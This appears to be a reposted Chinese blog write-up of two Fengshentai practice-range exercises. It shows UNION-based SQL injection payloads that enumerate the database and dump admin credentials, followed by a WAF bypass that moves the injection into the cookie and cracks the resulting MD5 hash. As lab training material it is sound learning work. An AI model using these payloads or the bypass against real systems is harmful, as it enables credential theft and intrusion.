我是靠谱客的博主 明亮万宝路,最近开发中收集的这篇文章主要介绍封神台靶场第一章:为了女神小芳!SQL注入第二章:遇到阻难!绕过WAF过滤,觉得挺不错的,现在分享给大家,希望可以做个参考。

概述

目录

第一章:为了女神小芳!SQL注入

第二章:遇到阻难!绕过WAF过滤


第一章:为了女神小芳!SQL注入

调小SQLmap参数去跑
手工注入 and 1=2
1. 判断字段数order by 3
2. 判断回显点union select 1,2
3. 查询相关内容 
查询当前数据库名 union select 1,database() maoshe
查询当前数据库版本union select 1,version()  5.5.53
查询当前数据库表名union select 1,table_name from information_schema.tables where table_schema=database() limit 0,1     admin
查询字段union select 1,column_name from information_schema.columns where table_schema=database() and table_name='admin' limit 0,1  
       union select 1,column_name from information_schema.columns where table_schema=database() and table_name='admin' limit 1,1 
admin 表里 有  id   username  password  三个字段
字段内容union select 1,username from admin  limit 0,1 admin
       union select 1,password from admin  limit 0,1    hellohack
得到管理员账号和密码

第二章:遇到阻难!绕过WAF过滤

直接尝试注入判断字段数order by 10

用from猜测有没有admin表 union select 1,2,3,4,5,6,7,8,9,10 from admin 被拦截

尝试,将测试语句放到cookie里面,再发送给服务器,因为网页防护一般只拦截Get、post传参。使用ModHeader插件,SQL语句的空格用加号代替

id=171+union+select+1,2,3,4,5,6,7,8,9,10+from+admin 

发现页面出现了2、3、7、8、9。

接着猜字段名username和password  

id=171+union+select+1,username,password,4,5,6,7,8,9,10+from+admin

username和password字段的值:admin、b9a2a2b5dffb918c

用MD5解码 welcome

默认管理员后台是根目录的/admin/

最后

以上就是明亮万宝路为你收集整理的封神台靶场第一章:为了女神小芳!SQL注入第二章:遇到阻难!绕过WAF过滤的全部内容,希望文章能够帮你解决封神台靶场第一章:为了女神小芳!SQL注入第二章:遇到阻难!绕过WAF过滤所遇到的程序开发问题。

如果觉得靠谱客网站的内容还不错,欢迎将靠谱客网站推荐给程序员好友。

本图文内容来源于网友提供,作为学习参考使用,或来自网络收集整理,版权属于原作者所有。
点赞(58)

评论列表共有 0 条评论

立即
投稿
返回
顶部